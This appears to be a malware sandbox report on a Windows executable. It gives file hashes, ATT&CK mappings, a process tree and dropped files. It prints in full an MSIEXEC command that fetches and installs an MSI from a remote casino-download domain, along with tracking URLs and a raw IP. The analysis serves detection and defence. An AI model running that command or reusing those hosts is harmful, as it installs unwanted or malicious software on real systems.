b49c9e0ed4283ba2d42cf2eddfb2510e95d0e853e6c79f26d0d5ffbcbd54a948

General

Target

157171d7f30aded47796c042696020e4_JaffaCakes118.exe
Size

1.4MB
MD5

157171d7f30aded47796c042696020e4
SHA1

2dde393ee604235430360ab7be8deffa84c712f2
SHA256

b49c9e0ed4283ba2d42cf2eddfb2510e95d0e853e6c79f26d0d5ffbcbd54a948
SHA512

aa4874b76b09b9185798f2195e4913b1b3cab79b5900063e2c2179e793ede16124da05da1c7af3df66283a5dc920af57535d1953ee6a8f6356d3fd787f70ac2a
SSDEEP

24576:6bq0qCDXNYDE6cEwVYSns0juQQLEd5nYUf9Bc2znIEMOsPxf3Kjskloqx/1UHPp6:cqgXNYY/E6s0juQQARJrc9OsPxfajL+O

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2328	uynnTZ.exe

Loads dropped DLL 3 IoCs

pid	Process
2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe
2328	uynnTZ.exe
2328	uynnTZ.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2684	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	157171d7f30aded47796c042696020e4_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uynnTZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2684	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2684	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2684	MSIEXEC.EXE
2684	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2488 wrote to memory of 2328	2488	157171d7f30aded47796c042696020e4_JaffaCakes118.exe	31
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32
PID 2328 wrote to memory of 2684	2328	uynnTZ.exe	32

C:\Users\Admin\AppData\Local\Temp\157171d7f30aded47796c042696020e4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\157171d7f30aded47796c042696020e4_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2488
- C:\Users\Admin\AppData\Local\Temp\uynnTZ.exe
  C:\Users\Admin\AppData\Local\Temp\uynnTZ.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://bfesz.cntntdnfls.eu/36175/cdn/clubworldcasinos/Club World Casinos20120928083212.msi" DDC_DID=2258213 DDC_RTGURL=http://www.dlhsetup.com/dl/TrackSetup/TrackSetup.aspx?DID=2258213 DDC_UPDATESTATUSURL=http://190.4.94.68:8080/clubworldcasinos/Lobby.WebServices/Installer.asmx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="uynnTZ.exe"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is1847.tmp

Filesize
1KB

MD5
c458a4e42697c0db33bbd7f1ecaf1f84

SHA1
2a4ca018d262c23a4ab4f33299ca77788b11c240

SHA256
1d7355dbc0e37c3d4146ae0e652432dd1f0ceff1d34b5a466b604422000e8981

SHA512
a249d4bdd8525961c5c146ebd991a4668dd864c8e43f5e5f0ce2c342881094a326f8fd2b384599357a720e6554cbdce2ecc26045d074aac107d0b65e20f6c8a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E5473A2D-3AB3-40E0-BE14-C0DA395A8956}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E5473A2D-3AB3-40E0-BE14-C0DA395A8956}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~1834.tmp

Filesize
5KB

MD5
625103e6ad710037c7b2f4b4a035ddf1

SHA1
d4ff2ae6f00ce78570b4e596e4cb6e7f2768a047

SHA256
24115271fdf55b94aea2a8aece072dc2d347e698b22adb43f547f768b61424d6

SHA512
5cab20cb43f7a4b24adee3a952dc55895f51712a650e719cfdbb9539ce4e302c096f8e40261fe63fa10974e82fd780e52c5a6c9bf3dfc47c1e3db0efba31924c

Download Submit
\Users\Admin\AppData\Local\Temp\uynnTZ.exe

Filesize
1.2MB

MD5
cb27838a7050bde92aa9638bf1ea8454

SHA1
674f4cd3f075a63ccdd156d5e83d216350c50841

SHA256
b2f17ee778c8ac3439037f7f4c232d57fe397aa158135c9c3f6276934843f3a8

SHA512
094631bcfccae26054a5d929dce1b90148a7d336570af56f39a95bab0951d112db414c476162f309b32aef5723c102ff233f1b98dcc6936e8184331183788fe0

Download Submit

Analysis

Sharing